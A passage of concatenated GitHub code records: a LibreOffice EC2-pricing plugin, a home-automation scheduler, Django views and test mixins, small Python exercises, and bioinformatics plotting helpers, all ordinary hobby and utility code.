row[0]))\n\n metadata[row[0]] = row[1]\n\n return metadata\n\n def _get_pricing_lines(self, pricing_lines_csv_text):\n data = []\n csv_data = csv.reader(pricing_lines_csv_text)\n\n csv_iter = iter(csv_data)\n header_row = next(csv_iter)\n for row in csv_iter:\n data.append(tuple(row))\n\n return tuple(header_row), tuple(data)\n\n def _get_pricing_data(self):\n with urllib.request.urlopen(self.EC2_PRICE_LIST_URL) as r, \\\n io.TextIOWrapper(\n r,\n encoding=r.headers.get_content_charset('utf-8')) \\\n as pricing_text:\n metadata = self._get_pricing_metadata(pricing_text)\n headers, data = self._get_pricing_lines(pricing_text)\n\n return metadata, headers, data\n\n def _update_pricing_metadata_sheet(self, sheet, metadata):\n sheet.clearContents(ALL_CELL_FLAGS)\n for row, row_key in enumerate(metadata):\n cell_range = sheet.getCellRangeByPosition(0, row, 1, row)\n cell_range.setDataArray(((row_key, metadata[row_key]),))\n\n def _update_pricing_data_sheet(\n self, sheet, headers, data_rows, status_indicator):\n sheet.clearContents(ALL_CELL_FLAGS)\n cell_range = sheet.getCellRangeByPosition(0, 0, len(headers) - 1, 0)\n cell_range.setDataArray((tuple(headers),))\n cell_range.CharWeight = BOLD\n\n all_data_range = sheet.getCellRangeByPosition(\n 0, 1, len(headers)-1, len(data_rows))\n print('len(data_rows): {}'.format(len(data_rows)))\n status_indicator.start('Loading pricing data...', len(data_rows))\n for start_row in range(0, len(data_rows) - self.NUM_DATA_ROWS_TO_LOAD,\n self.NUM_DATA_ROWS_TO_LOAD):\n print('loading start row: {}'.format(start_row))\n end_row = start_row + self.NUM_DATA_ROWS_TO_LOAD\n current_range = all_data_range.getCellRangeByPosition(\n 0, start_row, len(headers)-1, end_row - 1)\n current_range.setDataArray(data_rows[start_row:end_row])\n status_indicator.setValue(end_row)\n else:\n start_row = start_row + self.NUM_DATA_ROWS_TO_LOAD\n if start_row < len(data_rows):\n print('loading start row: {}'.format(start_row))\n end_row = len(data_rows)\n cell_range = all_data_range.getCellRangeByPosition(\n 0, start_row, len(headers)-1, end_row - 1)\n cell_range.setDataArray(data_rows[start_row:end_row])\n status_indicator.setValue(end_row)\n status_indicator.end()\n print('Row loaded: {}'.format(end_row))\n\n def execute(self, args):\n desktop = self.ctx.ServiceManager.createInstanceWithContext(\n \"com.sun.star.frame.Desktop\", self.ctx)\n\n doc = desktop.getCurrentComponent()\n\n pricing_data_sheet = _get_or_create_sheet(doc, self.PRICING_SHEET_NAME)\n pricing_metadata_sheet = _get_or_create_sheet(\n doc, self.PRICING_METADATA_SHEET_NAME)\n\n pricing_metadata, pricing_data_headers, pricing_data = (\n self._get_pricing_data())\n\n try:\n self._update_pricing_metadata_sheet(\n pricing_metadata_sheet, pricing_metadata)\n status_indicator = (\n doc.getCurrentController().getFrame().createStatusIndicator())\n import datetime\n start = datetime.datetime.now()\n self._update_pricing_data_sheet(\n pricing_data_sheet, pricing_data_headers, pricing_data,\n status_indicator)\n end = datetime.datetime.now()\n print(end-start)\n except:\n print(traceback.format_exc())\n\n\ng_ImplementationHelper.addImplementation(\n ImportEC2Pricing,\n 'org.penguintechs.wt.libreoffice.ImportEC2Pricing',\n ('com.sun.star.task.Job',),)\n\n\nclass ImportEC2InstanceData(unohelper.Base, XJob):\n INSTANCE_COUNTS_SHEET_NAME = 'current instance counts'\n INSTANCE_COUNTS_SHEET_HEADERS = ('az', 'service', 'instance_type', 'count')\n RESERVED_INSTANCE_COUNTS_SHEET_NAME = 'current reserved instance counts'\n RESERVED_INSTANCE_COUNTS_SHEET_HEADERS = ('az', 'instance_type', 'count')\n\n def __init__(self, ctx):\n self.ctx = ctx\n\n def _get_all_regions(self):\n print('Getting list of regions')\n client = boto3.client('ec2', region_name=BOOTSTRAP_REGION)\n regions_dict = client.describe_regions()['Regions']\n regions = [i['RegionName'] for i in regions_dict]\n print('Found regions: {}'.format(regions))\n return regions\n\n def _get_instance_type_counts_for_region(self, resource):\n counts = {}\n for instance in resource.instances.all():\n instance_type = instance.instance_type\n az = instance.placement['AvailabilityZone']\n service = 'unknown'\n if instance.tags is not None:\n for tag_dict in instance.tags:\n if tag_dict['Key'] == 'service':\n service = tag_dict['Value']\n counts[(az, service, instance_type)] = counts.get(\n (az, service, instance_type), 0) + 1\n return counts\n\n def _update_instance_counts_sheet(self, doc, instance_counts):\n sheet = _get_or_create_sheet(doc, self.INSTANCE_COUNTS_SHEET_NAME)\n sheet.clearContents(ALL_CELL_FLAGS)\n\n headers = self.INSTANCE_COUNTS_SHEET_HEADERS\n headers_range = sheet.getCellRangeByPosition(0, 0, len(headers) - 1, 0)\n headers_range.setDataArray((headers,))\n headers_range.CharWeight = BOLD\n\n data_range = sheet.getCellRangeByPosition(\n 0, 1, len(headers) - 1, len(instance_counts))\n for row, ((az, service, instance_type), count) in enumerate(\n instance_counts.items()):\n row_range = data_range.getCellRangeByPosition(\n 0, row, len(headers) - 1, row)\n row_range.setDataArray(((az, service, instance_type, count),))\n\n def _get_reserved_instance_counts_for_region(self, client):\n ris = client.describe_reserved_instances(\n Filters=[{'Name': 'state',\n 'Values': ['payment-pending', 'active']}])\n ri_counts = {}\n for ri in ris['ReservedInstances']:\n az = ri['AvailabilityZone']\n instance_type = ri['InstanceType']\n\n ri_counts[(az, instance_type)] = (\n ri_counts.get((az, instance_type), 0) + ri['InstanceCount'])\n return ri_counts\n\n def _update_reserved_instance_counts_sheet(self, doc, ri_counts):\n sheet = _get_or_create_sheet(\n doc, self.RESERVED_INSTANCE_COUNTS_SHEET_NAME)\n sheet.clearContents(ALL_CELL_FLAGS)\n\n headers = self.RESERVED_INSTANCE_COUNTS_SHEET_HEADERS\n headers_range = sheet.getCellRangeByPosition(0, 0, len(headers) - 1, 0)\n headers_range.setDataArray((headers,))\n headers_range.CharWeight = BOLD\n\n data_range = sheet.getCellRangeByPosition(\n 0, 1, len(headers) - 1, len(ri_counts))\n for row, ((az, instance_type), count) in enumerate(ri_counts.items()):\n row_range = data_range.getCellRangeByPosition(\n 0, row, len(headers) - 1, row)\n row_range.setDataArray(((az, instance_type, count),))\n\n def execute(self, args):\n desktop = self.ctx.ServiceManager.createInstanceWithContext(\n \"com.sun.star.frame.Desktop\", self.ctx)\n\n doc = desktop.getCurrentComponent()\n\n instance_counts = {}\n ri_counts = {}\n for region in self._get_all_regions():\n print('Getting instance data from {}'.format(region))\n resource = boto3.resource('ec2', region_name=region)\n client = boto3.client('ec2', region_name=region)\n instance_counts.update(\n self._get_instance_type_counts_for_region(resource))\n ri_counts.update(\n self._get_reserved_instance_counts_for_region(client))\n\n self._update_instance_counts_sheet(doc, instance_counts)\n self._update_reserved_instance_counts_sheet(doc, ri_counts)\n\n\ng_ImplementationHelper.addImplementation(\n ImportEC2InstanceData,\n 'org.penguintechs.wt.libreoffice.ImportEC2InstanceData',\n ('com.sun.star.task.Job',),)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('command')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n connect_string = 'socket,host=localhost,port=2002;urp'\n\n # Start OpenOffice.org, listen for connections and open testing document\n os.system(\n \"/usr/bin/libreoffice '--accept={};' --calc ./costing_test_doc.ods &\"\n .format(connect_string))\n\n # Get local context info\n localContext = uno.getComponentContext()\n resolver = localContext.ServiceManager.createInstanceWithContext(\n \"com.sun.star.bridge.UnoUrlResolver\", localContext)\n\n ctx = None\n\n # Wait until the OO.o starts and connection is established\n while ctx is None:\n try:\n ctx = resolver.resolve(\n \"uno:{};StarOffice.ComponentContext\".format(connect_string))\n except:\n pass\n\n # Execute our job\n if args.command == 'import_pricing':\n blah = ImportEC2Pricing(ctx)\n blah.execute(())\n elif args.command == 'import_instance_data':\n blah2 = ImportEC2InstanceData(ctx)\n blah2.execute(())\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger('boto3').setLevel(logging.INFO)\n logging.getLogger('botocore').setLevel(logging.INFO)\n main()\n","repo_name":"wt/libreoffice_python_plugin_example","sub_path":"Addons.py","file_name":"Addons.py","file_ext":"py","file_size_in_byte":12802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73791552374","text":"s = 0\n# c % 3 ==0\ncont = 0\ncontT = 0\nfor c in range(1, 500):\n if c % 3 == 0 and c % 2 != 0:# se c é multiplo de 3 e se c é ímpar\n s += c\n cont += 1\n contT += 1\n \nprint(f'Dentre os {contT} numeros,\\n o somatório dos {cont} números ímpares múltiplos de 3 no intervalo entre 1 e 500 é de {s}!')\n","repo_name":"ivanDourado/guanabaraPython","sub_path":"mundo2/exercicios/ex048.py","file_name":"ex048.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29906933422","text":"# o!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport serial\nimport time\nimport datetime\nimport requests\nimport sys\nimport msql\nimport json\nimport ssl\nimport urllib3\nurllib3.disable_warnings()\n#import ptvsd\n#ptvsd.enable_attach(secret=\"my_secret\")\n\nprint(\"####### Planning - Start #######\" + time.strftime('%A %d. %B %Y %H:%M', time.localtime()))\n\n############## TRY CONNECT SQL ##################\ncursor = msql.cursor\nDbConnect = msql.DbConnect\n\ndef SendDataToUsb(moduleName, moduleCom, moduleBaudrate, data): \n # if 'ser' not in locals() or not ser.is_open:\n ser = serial.Serial(port=moduleCom, baudrate=moduleBaudrate)\n ser.write(data.encode())\n\n\ndef UpdateDateRaz(deviceId):\n dateRaz = (datetime.datetime.now()+datetime.timedelta(seconds=1)).strftime('%Y-%m-%d %H:%M:%S')\n try:\n cursor.execute(\" update cmd_device set DateRAZ=%s where ID =%s\", (str(dateRaz), str(cmd_device_id)))\n except:\n print (time.strftime('%A %d. %B %Y %H:%M', time.localtime()) + \" Erreur dans la requete UpdateDateRaz dateRaz= \" + str(dateRaz)+ \" cmd_device_id= \"+str(cmd_device_id))\n pass\n\ndef Action(New_status, DeviceID, GUID, CarteID, Nom, Type, Widget_Id, Lieux, Device_Id, sensor_attach_value, ValueAct, EtatAct, ModuleName, ModuleConfiguration):\n try: \n Configuration = json.loads(ModuleConfiguration)\n except:\n Configuration = None\n \n if Type == \"Thermostat\":\n if float(sensor_attach_value) < float(New_Status):\n str_action = \"1\"\n else:\n str_action = \"0\"\n val = str(CarteID)+\"/\"+str(GUID)+\"_\"+str(Widget_Id)+\"_\"+str(DeviceID)+\"@\"+str(New_Status)+\":\"+str(str_action)+\"\\n\"\n if (str(ValueAct) != str(New_Status) or str(str_action) != str(EtatAct)):\n SendDataToUsb(ModuleName, Configuration[\"com\"], Configuration[\"baudrate\"], val)\n now = datetime.datetime.now()\n now = now.strftime('%Y-%m-%d %H:%M:%S')\n# cursor.execute(\"INSERT INTO Log (DeviceID, DATE, ACTION, Message) VALUES (%s, %s, %s, %s)\", (Device_Id, now, val, \"Planning: \"+Lieux+\" \"+Nom+\" \" + str(CarteID) + \" \" + str(DeviceID) + \" \" + str(New_Status)))\n UpdateDateRaz(cmd_device_id)\n cursor.execute(\"INSERT INTO Log (DeviceID, DATE, Message) VALUES (%s, %s, %s)\", (Device_Id, now, \"Planning: \"+Lieux+\" \"+Nom+\" \" + val)) \n else:\n val = str(CarteID)+\"/\"+str(GUID)+\"_\"+str(Widget_Id)+\"_\"+str(DeviceID)+\"@\"+str(New_Status)+\":\"+str(New_Status)+\"\\n\"\n if (ValueAct != New_Status or New_Status != EtatAct): \n SendDataToUsb(ModuleName, Configuration[\"com\"], Configuration[\"baudrate\"], val)\n now = datetime.datetime.now()\n now = now.strftime('%Y-%m-%d %H:%M:%S')\n# cursor.execute(\"INSERT INTO Log (DeviceID, DATE, ACTION, Message) VALUES (%s, %s, %s, %s)\", (Device_Id, now, val, \"Planning: \"+Lieux+\" \"+Nom+\" \" + str(CarteID) + \" \" + str(DeviceID) + \" \" + str(New_Status)))\n UpdateDateRaz(cmd_device_id)\n cursor.execute(\"INSERT INTO Log (DeviceID, DATE, Message) VALUES (%s, %s, %s)\", (Device_Id, now, \"Planning: \"+Lieux+\" \"+Nom+\" \" + val))\n\nwhile True:\n try:\n time.sleep(0.1)\n\n sql = \"\"\" SELECT Status\n ,cmd_device.id\n ,cmd_device.DeviceID\n ,Device.GUID\n ,Device.CarteID\n ,Device.Nom\n ,cmd_device.Type as TypeAction\n ,widget.Name\n ,widget.Id as widget_Id\n ,Lieux.Nom\n ,Device.ID\n ,IFNULL(sensor_attach.value,'') as sensor_attachValue \n ,'' as Request\n ,cmd_device.RAZ\n ,cmd_device.Value\n ,cmd_device.Etat\n ,Module_Type.ModuleName\n ,Module_Type.ModuleType\n ,Module_Type.ModuleConfiguration\n FROM Planning\n INNER JOIN cmd_device on cmd_device.ID = CmdDevice_Id AND Planning.Status != cmd_device.Etat\n INNER JOIN Device on Device.ID = cmd_device.Device_ID\n INNER JOIN Module_Type ON Device.Module_Id = Module_Type.ID\n INNER JOIN widget on widget.Id = cmd_device.Widget_Id\n INNER JOIN Lieux on Lieux.Id = Device.Lieux_ID\n LEFT JOIN cmd_device as sensor_attach on sensor_attach.ID = cmd_device.sensor_attachID\n WHERE \n (\n (\n DAYS like '%\"\"\"+str(time.localtime().tm_wday)+\"\"\"%' \n OR Planning.date = '\"\"\"+time.strftime(\"%y/%m/%d\")+\"\"\"'\n ) \n AND HOURS ='\"\"\"+time.strftime('%H:%M', time.localtime())+\"\"\":00'\n AND ACTIVATE = 1\n )\n UNION\n SELECT Status\n ,cmd_device_id\n ,DeviceID\n ,GUID\n ,CarteID\n ,Nom\n ,TypeAction\n ,WidgetName\n ,widget_Id\n ,LieuxNom\n ,Device_ID\n ,'' as sensor_attachValue\n ,IFNULL(Request,'') as sRequest\n ,RAZ\n ,Value\n ,Etat\n ,ModuleName\n ,ModuleType\n ,ModuleConfiguration\n FROM (\n SELECT 0 as Status, Device.GUID, cmd_device.id as cmd_device_id, cmd_device.DeviceID, Device.CarteID, Device.Nom, cmd_device.Type as TypeAction, widget.Name as WidgetName, widget.Id as widget_Id, Lieux.Nom as LieuxNom, Device.ID as Device_ID,Request, Date, IFNULL(DATE_ADD(Date ,INTERVAL RAZ SECOND),\"1900/01/01 00:00:00\") as DateToRaz, RAZ, DateRAZ, Value, Etat\n ,Module_Type.ModuleName, Module_Type.ModuleType, Module_Type.ModuleConfiguration\n FROM cmd_device\n INNER JOIN Device on Device.ID = cmd_device.Device_ID\n INNER JOIN Module_Type ON Device.Module_Id = Module_Type.ID\n LEFT JOIN widget on widget.Id = cmd_device.widget_Id\n LEFT JOIN Lieux on Lieux.Id = Device.Lieux_ID\n ) as t\n WHERE RAZ IS NOT NULL\n AND now() >= IFNULL(t.DateToRaz,'') \n AND now() > IFNULL(t.DateRAZ,'')\n # AND (t.Status != t.Etat or t.widget_Id = 5)\n AND (t.Status != t.Etat and t.Etat != '' or JSON_EXTRACT(t.Request, '$.url') != '')\n group by Device_ID, sRequest;\"\"\"\n\n cursor.execute(sql)\n for row in cursor.fetchall():\n New_Status = row[0]\n cmd_device_id = row[1]\n DeviceID = row[2]\n GUID = row[3]\n CarteID = row[4]\n Nom = row[5]\n TypeAction = row[6]\n WidgetName = row[7]\n Widget_Id = row[8]\n Lieux = row[9]\n Device_Id = row[10]\n sensor_attach_value = row[11]\n Request = row[12]\n RAZ = row[13]\n Value = row[14]\n Etat = row[15]\n ModuleName = row[16]\n ModuleType = row[17]\n ModuleConfiguration = row[18]\n\n if ModuleType == \"Communication\": \n Configuration = json.loads(ModuleConfiguration)\n Action(New_Status, DeviceID, GUID, CarteID, Nom, WidgetName, Widget_Id, Lieux, Device_Id, sensor_attach_value, Value, Etat, ModuleName, ModuleConfiguration)\n if TypeAction == \"Info\":\n dateRaz = (datetime.datetime.now()+datetime.timedelta(seconds=1)).strftime('%Y-%m-%d %H:%M:%S')\n try:\n cursor.execute(\" update cmd_device set cmd_device.Etat ='0', cmd_device.Value ='0' , DateRAZ=%s where ID =%s\", (dateRaz, str(cmd_device_id)))\n except:\n print (time.strftime('%A %d. %B %Y %H:%M', time.localtime()) + \" Erreur dans la requete UpdateDateRaz1 dateRaz= \" + dateRaz+ \" cmd_device_id= \"+str(cmd_device_id))\n pass\n # Minute = datetime.datetime.now().minute\n # cursor.execute(\"update cmd_device set date = (select DATE_FORMAT(now(), '%Y-%m-%d %H:00:00') - INTERVAL \"+str(Minute % RAZ)+\" SECOND) where ID =\"+str(cmd_device_id))\n elif Request != \"\":\n context = ssl._create_unverified_context()\n Request = json.loads(Request)\n url = \"https://127.0.0.1/ThiDom/Core/\"+Request[\"url_ajax\"]\n data = Request[\"data\"]\n postData = []\n\n if data != \"\":\n tbData = data.split(\"&\")\n for x in tbData:\n postData.append(x.split(\"=\"))\n\n if Device_Id:\n postData.append([\"Device_id\", str(Device_Id)])\n \n if cmd_device_id:\n postData.append([\"cmd_device_id\", str(cmd_device_id)])\n\n try:\n full_url = requests.post(url, data=postData, verify=False)\n UpdateDateRaz(cmd_device_id)\n except requests.exceptions.RequestException as e:\n print (time.strftime('%A %d. %B %Y %H:%M', time.localtime()) + \" Error planning Exec url :\" + url + \" error : \" + str(e))\n pass\n #elif RAZ != \"NULL\" and New_Status == 0:\n # else:\n # Action(New_Status, DeviceID, CarteID, Nom, WidgetName, Lieux, Device_Id, sensor_attach_value, Value, Etat)\n # cursor.execute(\" update cmd_device set cmd_device.Etat ='0', cmd_device.Value ='0' where ID =\"+str(cmd_device_id))\n DbConnect.commit()\n time.sleep(0.5)\n except KeyboardInterrupt:\n print (\"Bye\")\n sys.exit()\n","repo_name":"tguillaume02/ThiDom","sub_path":"Script_domotique/planning.py","file_name":"planning.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73661571572","text":"'''\n문서 검색\n'''\n\nstring = input()\ntarget = input()\nanswer = 0\n\nwhile target in string:\n string = string[string.find(target)+len(target):]\n answer += 1\n \nprint(answer)\n\n# document = input()\n# word = input()\n# index = 0\n# result = 0\n# while len(document) - index >= len(word):\n# if document[index:index + len(word)] == word:\n# result += 1\n# index += len(word)\n# else:\n# index += 1\n# print(result)\n","repo_name":"cotton-han/Algorithm","sub_path":"유형별/기본탐색/1543.py","file_name":"1543.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34463874203","text":"from django.shortcuts import render, redirect\n#from django.http import HttpResponse\nfrom .forms import ComboForm\nfrom .models import Combo\n#from giftcombo.comboFindercode import *\n\ndef upload_file(request):\n\tif request.method == 'POST':\n\t\tform = ComboForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect(file_download)\n\telse:\n\t form = ComboForm()\n\treturn render(request, 'upload_file.html', {\n\t\t'form': form\n\t\t})\n\ndef file_download(request):\n\tcombos = Combo.objects.all()\n\treturn render(request, 'file_download.html', {\n\t\t'combos' : combos\n\t\t})","repo_name":"khushgrover/gift-combo-finder","sub_path":"giftcombo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18929277537","text":"import file_transfer\nimport configs as cfg\n\n\nfile_name = 'requirements.txt'\nbucket_name = 'phil-nas-backup-bucket'\nS3_file_name = f'{file_name}-uploaded'\ndirName = 'C:/Users/phil_/Downloads'\n \n# Get the list of all files in directory tree at given path\nlistOfFiles = getListOfFiles(dirName)\nprint(listOfFiles)\n\n\n#not working due to what I modified in \"file_transfer.py\" s3.client vs s3.resource\nfile_transfer.upload_with_default_configuration(file_name,bucket_name,S3_file_name,1)\n\nuploaded = upload_to_aws(file_name, bucket_name, S3_file_name)\n\n","repo_name":"PhilMcDaniel/AWS-S3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21167483968","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('create_painting/',views.PaintingCreateView.as_view(),name='create_painting'),\n path('painting/',views.PaintingDetailView.as_view(),name='painting_detail'),\n path('sonic/',views.sonic,name='sonic'),\n path('signup/',views.SignUpView.as_view(),name='signup'),\n path('profile',views.CheckedOutBooksByUserView.as_view(),name='profile')\n]","repo_name":"zvallarino/DjangoModels","sub_path":"paintings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17315183475","text":"from functools import reduce\nfrom decimal import Decimal\ndef add(arg1=None):\n if arg1==\"\":\n return \"0\"\n\n string_with_commas = arg1.replace('\\n', ',')\n double_comma = string_with_commas.find(\",,\")\n list_args = string_with_commas.split(',')\n if not double_comma == -1:\n return f\"Number expected but '{arg1[double_comma+1]}' found at position {double_comma+1}.\"\n\n list_dec = [Decimal(u) for u in list_args]\n return str(sum(list_dec))\n \n\n\n","repo_name":"Spendesk/code-dojos","sub_path":"src/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32971927493","text":"from .assertions import *\n\n\nclass ModelAPICreateTestMixin:\n \"\"\"Test mixing for model creating endpoints. \"\"\"\n\n def create_data(self):\n \"\"\"must be overridden with the desired data which will be sent\n in the body of the http request to test creating an entity.\n\n :return dict.\n \"\"\"\n return {}\n\n def test_create_resource(self):\n # mock\n obj_data = self.create_data()\n\n obj_data.update({\n f'{key}_id': val.id for key, val\n in self.requirements.items()\n })\n\n # act\n response = self.client.post(self.base_uri, obj_data, format='json')\n\n # assert\n assert_object_created(self.MODEL, response)\n\n # load created entity\n entity = self.MODEL.objects.get(pk=response.json()['id'])\n\n # let the user create it's own assertions\n self.assert_after_create(entity)\n\n def assert_after_create(self, entity):\n \"\"\"when overridden allows user to make custom assertions.\n runs after the entity is persisted in the database.\n \"\"\"\n pass\n\n\nclass ModelAPIUpdateTestMixin:\n \"\"\"Test mixing for model updating endpoints. \"\"\"\n\n def update_data(self):\n \"\"\"must be overridden with the desired data which will be sent\n in the body of the http request to test updating an entity.\n\n :return dict.\n \"\"\"\n return {}\n\n def test_update_resource(self):\n # mock\n # __import__('ipdb').set_trace()\n resource = self.build()\n update_data = self.update_data()\n obj_data = {\n **update_data,\n **{f'{k}_id': v.id for k, v in self.requirements.items()}\n }\n\n # act\n response = self.client.put(\n f'{self.base_uri}{resource.id}/', obj_data, format='json')\n\n # assert\n updated_resource = self.MODEL.objects.get(pk=resource.id)\n\n for key, val in update_data.items():\n if key not in self.NESTED_MODELS:\n assert_field_equality(updated_resource, key, val)\n\n\nclass ModelAPIQueryTestMixin:\n \"\"\"Test mixing for model querying endpoints. \"\"\"\n\n def test_get_resources(self):\n # mock\n resource = self.build()\n\n # act\n response = self.client.get(self.base_uri)\n\n # assert\n assert_response_contains_object(resource, response)\n\n def test_get_resource_by_key(self):\n # mock\n resource = self.build()\n\n # act\n response = self.client.get(f'{self.base_uri}{resource.id}/')\n\n # assert\n assert_response_contains_object(resource, response, is_array=False)\n\n","repo_name":"Forked-ONS/domain_schema","sub_path":"core/utils/testing/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30656085054","text":"# Exercise 17 of \"Learn Python3 the Hard Way\"\n# More Files\n#\n# use exist() to check if file alrady there.\n# \"w\" overwrite only; \"a+\" append and read\n# len() # length of a string\n\nfrom sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file = argv\n\nprint(f\"Copying from {from_file} to {to_file}\")\n\n# we could do these two on one line, how?\nin_file = open(from_file)\nindata = in_file.read()\n# indata = open(from_file).read()\n\nprint(f\"The input file is {len(indata)} bytes long.\")\n\nprint(f\"Does the output file exist? {exists(to_file)}\")\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\n# out_file = open(to_file, \"w\")\nout_file = open(to_file, \"a+\")\nout_file.write(indata)\n\nprint(\"Allrihgt, all done.\")\n\nout_file.close()\nin_file.close()\n","repo_name":"TomFoxLee/Python543","sub_path":"LPY3THW/ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6403031523","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\na = json.load(open('error_stats_master50.json', 'r'))\n\n# Plot yaw errors\nyaw_values = np.array(a['yaw_value'])\nyaw_errors = np.array(a['yaw_error'])\nyaw_values_bin = yaw_values // 3\n\nplt.scatter(yaw_values, yaw_errors, s = 1)\nplt.show()\n\n# Plot pitch errors\npitch_values = np.array(a['pitch_value'])\npitch_errors = np.array(a['pitch_error'])\npitch_values_bin = pitch_values // 3\n\nplt.scatter(pitch_values, pitch_errors, s = 1)\nplt.show()\n\n# Plot roll errors\nroll_values = np.array(a['roll_value'])\nroll_errors = np.array(a['roll_error'])\nroll_values_bin = roll_values // 3\n\nplt.scatter(roll_values, roll_errors, s = 1)\nplt.show()\n\n# idx_yaw = [i for i in range(len(yaw_values)) if abs(yaw_values[i]) <= 30]\n# print(np.mean(yaw_errors[idx_yaw]))\n#\n# idx_pitch = [i for i in range(len(pitch_values)) if abs(pitch_values[i]) <= 30]\n# print(np.mean(pitch_errors[idx_pitch]))\n#\n# idx_roll = [i for i in range(len(roll_values)) if abs(roll_values[i]) <= 30]\n# print(np.mean(roll_errors[idx_roll]))\n","repo_name":"zivic91/deep-head-pose-v2","sub_path":"analysis/analyze_errors.py","file_name":"analyze_errors.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12095887169","text":"## this tool is the core function of cnv and snv analysis\r\n## author: taozhou\r\n## email: zhou.tao@genecast.com.cn\r\n\r\nimport matplotlib as mpl\r\nmpl.use('Agg')\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nimport itertools\r\nimport seaborn as sns\r\nimport matplotlib.pylab as plt\r\nimport matplotlib.colors as mc\r\nfrom genecast_package.svm_analysis import feature_select, evaluate_model\r\nfrom sklearn.decomposition import PCA\r\nfrom collections import OrderedDict\r\nfrom collections import defaultdict\r\nimport datetime\r\nimport pandas as pd\r\nimport os\r\nimport sh\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndef z_score(data, axis):\r\n if axis == 1:\r\n z_scored = data\r\n else:\r\n z_scored = data.T\r\n z_scored = (z_scored - z_scored.mean()) / z_scored.std()\r\n\r\n if axis == 1:\r\n return z_scored\r\n else:\r\n return z_scored.T\r\n\r\n\r\ndef pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, save=\"pdf\", color=None, name=None):\r\n data = z_score(data, axis=0)\r\n if len(data.columns) > 30:\r\n xticklabels = False\r\n if len(data) > 80:\r\n yticklabels = False\r\n vmin, vmax = data.unstack().quantile([.01, .99])\r\n re = sns.clustermap(data, cmap=\"bwr\", row_cluster=True, col_cluster=col_cluster, figsize=(13, 10), \\\r\n xticklabels=True, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)\r\n re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)\r\n re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)\r\n if col_cluster == False:\r\n for group, number in length.items():\r\n re.ax_col_colors.text((number[0] + number[1])/2 - len(group)/2, 1.1, group, size=30)\r\n re.savefig(name + \".\" + save)\r\n else:\r\n re.savefig(name + \"_col_cluster.\" + save)\r\n plt.close()\r\n\r\n\r\ndef make_col_color_heatmap(group_dic):\r\n common_color = [\"blue\", \"red\", \"green\", \"grey\"]\r\n color = {}; length = {}\r\n temp = 0\r\n i = 0\r\n for name, group in group_dic.items():\r\n length[name] = [temp, temp + len(group)]\r\n temp += len(group)\r\n for sample in group:\r\n color[sample] = common_color[i]\r\n i += 1\r\n color = pd.Series(color)\r\n color.name = \"group\"\r\n return color, length\r\n\r\n\r\ndef pca(data, group_dic, n=None):\r\n pca = PCA(n_components=2)\r\n group = []\r\n length = OrderedDict()\r\n temp = 0\r\n for name, g in group_dic.items():\r\n length[name] = [temp, temp + len(g)]\r\n temp += len(g)\r\n group += g\r\n data = data[group]\r\n newData = pca.fit_transform(data.T)\r\n colors = [\"blue\", \"red\", \"green\", 'turquoise', \"grey\"]\r\n i = 0\r\n for name, number in length.items():\r\n plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[i])\r\n i += 1\r\n plt.title(\"PCA analysis\")\r\n pc1 = 100*pca.explained_variance_ratio_[0]\r\n pc2 = 100*pca.explained_variance_ratio_[1]\r\n plt.xlabel(\"PC1(%.1f)\" % pc1)\r\n plt.ylabel(\"PC1(%.1f)\" % pc2)\r\n plt.legend()\r\n plt.savefig(\"PCA_%s.png\" % n)\r\n plt.close()\r\n\r\n\r\ndef plot_box(data, which, outname, palette, regulation, group):\r\n fig, ax1 = plt.subplots(figsize=(8,12))\r\n box_data = defaultdict(list)\r\n if which == \"cnv\":\r\n how = \"mean\"\r\n for name, g in group.items():\r\n box_data[name] = data[g].mean(0)\r\n else:\r\n how = \"sum\"\r\n for name, g in group.items():\r\n box_data[name] = data[g].sum(0)\r\n 